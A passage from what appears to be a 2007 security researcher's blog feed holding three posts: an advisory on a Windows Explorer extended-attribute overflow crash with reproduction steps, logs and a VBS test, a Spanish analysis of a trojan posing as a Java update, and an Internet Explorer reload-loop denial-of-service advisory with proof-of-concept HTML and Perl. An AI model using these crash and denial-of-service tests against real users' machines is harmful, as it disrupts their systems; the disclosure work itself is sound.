other functions can be vulnerables too <br />
look this table:<br />
<br />
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/NT%20Objects/File/FILE_INFORMATION_CLASS.html<br />
<br />
<br />
wen we put the hand over a file explorer.exe call the extended<br />
file attributes and show this information in a 'bubble' or wen<br />
open a folder explorer look for obtain directory listing, name<br />
files and other information about the files.<br />
<br />
how to locate the overflow ?<br />
<br />
1-create a new txt file for example explorer.txt<br />
2-rigth click on the file and try propierties<br />
3-in all of the boxes (author ,tittle ,subject,and in special<br />
in comment text area) write multiples A for example or moore:<br />
<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<br />
<br />
<br />
4-use filemon http://www.microsoft.com/technet/<br />
sysinternals/FileAndDisk/Filemon.mspx<br />
<br />
and include process explorer.exe<br />
<br />
5-click on the txt propierties and click on accept or on aply .<br />
<br />
6-go to filemon and look the log for explorer.exe you have some<br />
similar to this :<br />
<br />
<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE<br />
NOT FOUND Options: Open Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA SUCCESS<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Docf_ SummaryInformation:$DATA FILE<br />
NOT FOUND Options: Open Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Options:<br />
Create Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileFsAttributeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Position:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileAllInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA FILE<br />
NOT FOUND Options: Open Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CLOSE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileAllInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_CREATE C:\Documents and<br />
Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Options:<br />
OverwriteIf Access: All<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileFsAttributeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
0<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:<br />
88<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
88<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Length:<br />
88<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_VOLUME_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA SUCCESS FileFsVolumeInformation<br />
21:24:00.031 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\: SummaryInformation:$DATA BUFFER<br />
OVERFLOW FileAllInformation<br />
21:24:00.046 explorer.exe:1700 IRP_MJ_SET_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS Position:<br />
30996<br />
21:24:00.046 explorer.exe:1700 IRP_MJ_QUERY_INFORMATION C:\Documents<br />
and Settings\Lostmon\Escritorio\explorer_overflow.txt\:Updt_ SummaryInformation:$DATA SUCCESS FilePositionInformation<br />
<br />
the overflow is done :)<br />
<br />
affter you can put the hand over the file and explorer show the extended file atributes<br />
and some times filemon mark again the overflow<br />
<br />
<br />
###################<br />
3-versions tested<br />
###################<br />
<br />
i only test with :<br />
<br />
Microsof windows XP Home edition all fixes 17/05/2007<br />
Explorer.exe 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)<br />
<br />
###################<br />
4-Solution<br />
###################<br />
<br />
Wait for a update or patch<br />
<br />
####################<br />
5-Timeline:<br />
####################<br />
<br />
Discovered:12-03-2007<br />
Vendor notify:19-03-2007<br />
Vendor response:22-03-2007<br />
Private disclosure:17-05-2007<br />
Public disclosure:04-06-2007<br />
<br />
######################<br />
6-Response from vendor<br />
######################<br />
<br />
Thank you for checking up on this case, We have concluded<br />
our investigations on this matter and have found this crash<br />
to be un-exploitable. This vulnerability is very similar to<br />
another milworm posting (http://www.milw0rm.com/exploits/3419.<br />
As we have not been able to find an exploitable angle for <br />
this issue this crash will get tracking into the next available<br />
Service Pack fix.<br />
<br />
#####################<br />
7- Test<br />
#####################<br />
<br />
1 download this exploit:<br />
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar<br />
put uncompress it in c:\test or edit in EFA_test.vbs the correct<br />
path were you put the malformed doc file.<br />
<br />
2 copy EFA_test.vbs and edit the correct path to file.<br />
<br />
3 execute EFA_test.vbs <br />
<br />
the file look for the exteded file attributes <br />
of the malformed doc file and wen try to read <br />
the attribute "author" windows Scripting host<br />
Is crashing.<br />
<br />
Other overflows could be done in all boxes of <br />
the file propperties.<br />
The applications is crashing because we for look<br />
the malformed doc file use a vbs script.<br />
if any other aplication try to look the malformed <br />
doc file crash too.<br />
<br />
this is a simple test using a existing exploit for<br />
microsoft ole32dll.dll , but the overflow is moore deep<br />
is in ntdll.dll because ntdll.dll is the library what use<br />
NtQueryInformationFile for obtain the extended file attributes.<br />
<br />
is for that that this overflow it is posible to be<br />
done in all file type with a malformed extended file attributes.<br />
<br />
<br />
<br />
########################################<br />
8-related vulns and documentations<br />
########################################<br />
<br />
########################<br />
EFA_test.vbs<br />
########################<br />
<br />
Dim arrHeaders(35)<br />
Set objShell = CreateObject("Shell.Application")<br />
Set objFolder = objShell.Namespace("C:\test")<br />
For i = 0 to 34<br />
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)<br />
Next<br />
For Each strFileName in objFolder.Items<br />
For i = 0 to 34<br />
Wscript.Echo i & vbtab & arrHeaders(i) _<br />
& ": " & objFolder.GetDetailsOf(strFileName, i)<br />
Next<br />
Next<br />
<br />
<br />
<br />
###################<br />
RELATED VULNS :<br />
###################<br />
<br />
http://secunia.com/advisories/10020/<br />
<br />
http://secunia.com/advisories/10194/<br />
<br />
http://osvdb.org/displayvuln.php?osvdb_id=31885<br />
<br />
http://osvdb.org/displayvuln.php?osvdb_id=31886<br />
<br />
http://osvdb.org/displayvuln.php?osvdb_id=31887<br />
<br />
###################<br />
Related Exploit<br />
###################<br />
<br />
http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar<br />
<br />
#################<br />
Related Microsoft<br />
security bulletin<br />
#################<br />
<br />
http://www.microsoft.com/technet/security/advisory/933052.mspx<br />
<br />
##################<br />
RElated functions<br />
##################<br />
<br />
extended file attributes<br />
http://en.wikipedia.org/wiki/Extended_file_attributes<br />
<br />
GetExtFileProperties() <br />
http://www.kixtart.org/forums/ubbthreads.php?ubb=showflat&Number=160880&page=1<br />
<br />
File information class:<br />
http://undocumented.ntinternals.net/UserMode/Undocumented%20Functions/<br />
NT%20Objects/File/FILE_INFORMATION_CLASS.html<br />
<br />
posible source code of ntdll<br />
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.c<br />
http://www.cybertech.net/~sh0ksh0k/projects/old/win32toolkit/ntdll.h<br />
http://source.winehq.org/source/dlls/ntdll/file.c<br />
the links of ntdll.c and ntdll.h aparently are dead you can try <br />
to search it in google´s cache, sorry for the inconvenience<br />
<br />
###############################€nd#########################<br />
<br />
thnx To estrella to be my ligth<br />
Thnx To FalconDeOro Hi is investigate and documented with me this issue.<br />
Thnx to Icaro and Badchecksum Team for interesting in research.<br />
Thnx To Jkouns and Jericho for his patience.<br />
Thnx to All osvdb Maglers they are involved in a very nice project.<br />
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers<br />
They put in my hands all what i need in this and others researchs.<br />
Thnx to All Lostmon´s Group Team<br />
Thnx to Microsoft for the responses.<br />
<br />
--<br />
atentamente:<br />
Lostmon (lostmon@gmail.com)<br />
Web-Blog: http://lostmon.blogspot.com/<br />
Google group: http://groups.google.com/group/lostmon (new)<br />
--<br />
La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-36707590591563623262007-06-02T04:58:00.000-07:002007-06-02T11:03:49.105-07:00Troyano que simula ser actualizacion javaEn los ultimos dias se viene distribuyendo por correo electronico<br />un correo en el cual se nos informa de un fallo de seguridad en java<br /><br /><p align="left"><object height="250" width="400"><param name="movie" value="http://www.spymac.com/hop?id=2058756"><param name="wmode" value="transparent"><embed src="http://www.spymac.com/hop?id=2058756" type="application/x-shockwave-flash" wmode="transparent" width="400" height="250"></embed></object></p><br />Desde ese mismo correo se nos insta a descargar la actualizacion que<br />solucionara el problema de seguridad.<br /><br />Al ir al sitio de descarga ,que aparentemente es parecido al sitio<br />de descarga de Sum microsystems , se nos descarga un arcchivo llamado<br />install_javav6up2.exe el cual contiene un troyano.<br /><br /></p><p align="left"><object height="250" width="400"><param name="movie" value="http://www.spymac.com/hop?id=2058757"><param name="wmode" value="transparent"><embed src="http://www.spymac.com/hop?id=2058757" type="application/x-shockwave-flash" wmode="transparent" width="400" height="250"></embed></object></p><br />Si obtenemos un pequeño informe del archivo vemos que se ha falseado<br />hasta la informacion de version del archivo para aparentar se de Sun<br />el mensaje incorpora varias url que provienen de un server el cual<br />seguramente ya este comprometido.<br /><br />http://201.22.57.XX/JAVA/_software/update/index.php?request=Update&program=java<br />http://201.22.57.XX/JAVA/_software/update/index.php?USUARIO=5B3U6H843N45E82<br />http://201.22.57.XX/JAVA/_software/download/get.php?license=5B3U6H843N45E82&mode=manual<br /><br />##################<br />Analisis del archivo<br />####################<br /><br /><br />********************************************************************<br />FileAlyzer © 2003-2005 Patrick M. Kolla. All Rights Reserved.<br />********************************************************************<br /><br /><br />File: C:\Documents and Settings\Lostmon\Escritorio\install_javav6up2.exe<br />Date: 02/06/2007 2:04:08<br /><br /><br />***** General ******************************************************<br />Ubicación: C:\Documents and Settings\Lostmon\Escritorio\<br />Tamaño: 192512<br />Versión: 1.2.5.2<br />CRC-32: 93EEBEE2<br />MD5: 70CACC3D64585343F6AA04C3135BA24B<br />SHA1: 20E9C0990D76AB1E8CF84C9425B3F64365E94926<br />Sólo lectura: No<br />Oculto: No<br />Archivo del sistema: No<br />Carpeta de archivos: No<br />Archivo: Yes<br />Enlace simbólico: No<br />Time stamp: sábado, 02 de junio de 2007 11:31:36<br />Creado: sábado, 02 de junio de 2007 11:31:34<br />Último acceso: sábado, 02 de junio de 2007 2:01:16<br />Modificado: sábado, 02 de junio de 2007 11:31:36<br /><br /><br />***** Versión ******************************************************<br />Idiomas soportados:: Portugués (Brasil) (1046/1252)<br />--- Versión --------------------------------------------------------<br />Versión del archivo: 1.2.5.2<br />Empresa: Java<br />Nombre interno:<br />Comentarios:<br />Copyright:<br />Marcas registradas:<br />Nombre original: instal_plugin98MEXP.exe<br />Nombre del producto:<br />Versión del producto: 2.0.0.0<br />Descripción: Sun Microsystems Corporation - Arquivo de atualização<br />Versión privada:<br />Versión especial:<br /><br /><br />***** Recursos *****************************************************<br />--- Cursor ---------------------------------------------------------<br />1<br />2<br />3<br />4<br />5<br />6<br />7<br />--- Bitmap ---------------------------------------------------------<br />BBABORT<br />BBALL<br />BBCANCEL<br />BBCLOSE<br />BBHELP<br />BBIGNORE<br />BBNO<br />BBOK<br />BBRETRY<br />BBYES<br />PREVIEWGLYPH<br />--- Icon -----------------------------------------------------------<br />1<br />2<br />--- Dialog ---------------------------------------------------------<br />DLGTEMPLATE<br />--- String Table ---------------------------------------------------<br />4081<br />4082<br />4083<br />4084<br />4085<br />4086<br />4087<br />4088<br />4089<br />4090<br />4091<br />4092<br />4093<br />4094<br />4095<br />4096<br />--- RCData ---------------------------------------------------------<br />DVCLAL<br />PACKAGEINFO<br />TXTREM<br />--- Cursor Group ---------------------------------------------------<br />32761<br />32762<br />32763<br />32764<br />32765<br />32766<br />32767<br />--- Icon Group -----------------------------------------------------<br />MAINICON<br />--- Version Info ---------------------------------------------------<br />1<br /><br /><br />***** Cabecera PE **************************************************<br />Signature: 00004550<br />Machine: 014C - Intel 386<br />Number of sections: 0008<br />Time/Date stamp: 2A425E19<br />Pointer to symbol table: 00000000<br />Number of symbols: 00000000<br />Size of optional header: 00E0<br />Characteristics: 818E<br />Magic: 010B<br />Linker version (major): 02<br />Linker version (minor): 19<br />Size of code: 00000000<br />Size of initialized data: 0000E800<br />Size of uninitialized data: 00000000<br />Address of entry point: 00064BD6<br />Base of code: 00001000<br />Base of data: 00050000<br />Image base: 00400000<br />Section alignment: 00001000<br />File alignment: 00000200<br />OS version (major): 0004<br />OS version (minor): 0000<br />Image version (major): 0000<br />Image version (minor): 0000<br />Sub system version (major): 0004<br />Sub system version (minor): 0000<br />Win32 version: 00000000<br />Size of image: 00066000<br />Size of headers: 00000400<br />Checksum: 000308BA<br />Sub system: 0002 - Windows graphical user interface (GUI) subsystem<br />DLL characteristics: 0000<br />Size of stack reserve: 00100000<br />Size of stack commit: 00004000<br />Size of heap reserve: 00100000<br />Size of heap commit: 00001000<br />Loader flags: 00000000<br />Number of RVA: 00000010<br /><br /><br />***** Secciones PE *************************************************<br />CRC-32: 7059EB4D<br />MD5: 83C09E84F35E245A0ADA5CC66D4C9B3B<br />----- Secciones PE -------------------------------------------------<br />Sección TamañoVirt. DirecciónVirt. TamañoFís. TamañoFís. Parámetros<br />0004F000 00001000 00028600 00000400 C0000040<br />00002000 00050000 00000A00 00028A00 C0000040<br />00001000 00052000 00000000 00029400 C0000040<br />00002000 00053000 00000E00 00029400 C0000040<br />00001000 00055000 00000000 0002A200 C0000040<br />00007000 00056000 00000200 0002A200 C0000040<br />.rsrc 00006000 0005D000 00002400 0002A400 C0000040<br />00003000 00063000 00002800 0002C800 C0000040<br /><br /><br />***** Importar/Exportar tabla **************************************<br />--- Export table ---------------------------------------------------<br />--- Import table (libraries: 2) ------------------------------------<br />kernel32.dll (imports: 1)<br />GetModuleHandleA<br />user32.dll (imports: 1)<br />MessageBoxA<br /><br />################## €nd #############<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-82094048097158779602007-04-25T12:52:00.000-07:002007-04-28T13:27:02.295-07:00Internet Explorer Body tag recoverable DoS issue#####################################################<br />Internet Explorer Body tag recoverable DoS issue<br />Vendor url:http://www.microsoft.com<br />Advisore:http://lostmon.blogspot.com/2007/04/posible-ie7-dos.html<br />Vendor notify:YES Vendor confirmed:YES Exploit include:YES<br />#####################################################<br /><br /><br />Microsoft Internet Explorer contains a flaw that may allow a<br />malicious user to cause IE7 to enter a loop in which IE7<br />become unresponsive resulting in a recoverable DoS issue.<br />(Only affect the process what we open the file)the user,only can<br />terminate the process<br /><br />The result in Internet Explorer is the browser seems to "hang".<br />I have not discovered a way to leverage the "hang" to gain<br />execution of arbitrary code.<br /><br /><br />############<br />versions<br />############<br /><br />Tested on all of this versions:<br /><br />#########<br />IE7<br />#########<br /><br />Windows Vista =>vulnerable<br />Windows XP SP2 =>vulnerable<br />Windows XP Home SP2 =>vulnerable<br /><br />#########<br />IE6<br />#########<br /><br />Windows 2000 => Not vulnerable ?<br />Windows XP SP2 =>vulnerable<br />Windows XP Home SP2 =>vulnerable<br /><br /><br />############<br />Solution<br />###########<br /><br />Microsoft is working in a<br />update version, patch or similar.<br /><br />#############<br />Timeline<br />#############<br /><br />Discovered:29-01-2007<br />Vendor notify: 11-03-2007<br />Vendor response:11-03-2007<br />Private Disclosure:07-02-2007<br />Public Disclosure: 25-04-2007<br /><br /><br /><br />#########################<br /><br /> <span id="st" name="st">IE7</span> and 6 Body tag PoC<br /><br /> #########################<br /><br /> <br /><br /> ###################<br /><br /> Source of eso.pl<br /><br /> ###################<br /><br /> <br /><br /> print "<html>\ n";<br /> print "<head>";<br /> print "<title>";<br /> print "Internet Explorer Body tag <span id="st" name="st">DoS</span> Perl PoC By Lostmon<br /> (<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:lostmon@Gmail.com">lostmon@Gmail.com</a>)";<br /> print "</title>";<br /> print "</head>";<br /> print "<body onload='location.reload()'>";<br /> print "<p><a href='<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lostmon.blogspot.com/%27" target="_blank">http://lostmon.blogspot.com/'</a>>";<br /> print "Internet Explorer Body tag <span id="st" name="st">DoS</span> Perl PoC By Lostmon<br /> (<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:lostmon@Gmail.com">lostmon@Gmail.com</a>)";<br /> print "</a></p>";<br /> print "</body>";<br /> print "</html>";<br /> <br /> ##############################<br /><br /> ##############################<br /><br /> Source of eso.html<br /><br /> ##############################<br /><br /> <br /><br /> print "<html>\ n"<br /> print "<head>"<br /> print "<title>"<br /> print "Internet Explorer Body tag <span id="st" name="st">DoS</span> Perl PoC By Lostmon<br /> (<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:lostmon@Gmail.com">lostmon@Gmail.com</a>)"<br /> print "</title>"<br /> print "</head>"<br /> print "<body onload='location.reload()'>"<br /> print "<p><a href='<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lostmon.blogspot.com/%27" target="_blank">http://lostmon.blogspot.com/'</a>>"<br /> print "Internet Explorer Body tag <span id="st" name="st">DoS</span> Perl PoC By Lostmon<br /> (<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:lostmon@Gmail.com">lostmon@Gmail.com</a>)"<br /> print "</a></p>"<br /> print "</body>"<br /> print "</html>"<br /> <br /><br /> ###############################<br /><br /> ###############################<br /><br /> Source of eso.htm<br /><br /> ###############################<br /><br /> <br /><br /> <html><br /> <head><br /> <title><br /> Internet Explorer Body tag <span id="st" name="st">DoS</span> Perl PoC By Lostmon (<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:lostmon@Gmail.com">lostmon@Gmail.com</a>)<br /> </title><br /> </head><br /> <body onload='location.reload()'><br /> <p><a href='<a onclick="return top.js.OpenExtLink(window,event,this)" href="http://lostmon.blogspot.com/%27" target="_blank">http://lostmon.blogspot.com/'</a>><br /> Internet Explorer Body tag <span id="st" name="st">DoS</span> Perl PoC By Lostmon (<a onclick="return top.js.OpenExtLink(window,event,this)" href="mailto:lostmon@Gmail.com">lostmon@Gmail.com</a>)<br /> </a><br /> </p><br /> </body><br /> </html><br /><br /> ################################<br /><br /> <br /><br /> #######################End###################<br /><br /> <br /><br />Special THnx to Secunia Research Team they made<br />me include/understand of which one treated and<br />put in my hands !!!ALL!!! What i need for this research !!!!<br />Secunia:http://www.secunia.com/<br /><br />Thnx To estrella pq siempre estas en mi pensamiento<br />aunque no coincidamos y por plantar en mi la semilla<br />de la curiosidad , durante noches y noches !!<br /><br />Thnx To FalconDeOro :<br />la paciencia es un a virtud pequeño Jedy !!<br />Gracias por tu ayuda y soporte :*<br /><br />Thnx to all Microsoft Security Response Center<br />in specia To Annette.<br />http://www.microsoft.com/technet/security/<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
